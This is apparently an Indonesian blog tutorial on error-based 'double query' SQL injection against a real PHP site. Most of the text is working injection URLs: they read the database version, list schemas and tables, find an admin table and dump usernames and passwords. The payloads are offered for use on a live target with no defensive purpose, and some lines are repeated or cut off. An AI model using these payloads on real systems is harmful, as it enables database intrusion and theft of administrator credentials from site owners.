Assalamualaikum
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection :D
target sensor yah :D
http://janda.com/pro.php?id=8
kasih tanda petik dan perhatikan error nya
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection :D
target sensor yah :D
http://janda.com/pro.php?id=8
kasih tanda petik dan perhatikan error nya
kemudian kita cari version nya dengan perintah
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
version nya : 5.0.96-log
sekarang cari database nya
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst
database: challanich
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
sekarang mencari tabel dari database challanich
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
beruntung langsung ada kata admin :D
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi
okay lanjut, sekarang melihat column dari table ch_admin
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
perhatikan warna merah yah
nah limit nya kitah ubah lagi
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
jadi kita simpulkan yang penting : user+password
sekarang dump
sekarang dump
liat yang berwarna merahjanda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
okay sekian dan terima kasih
semoga bermanfaat :D
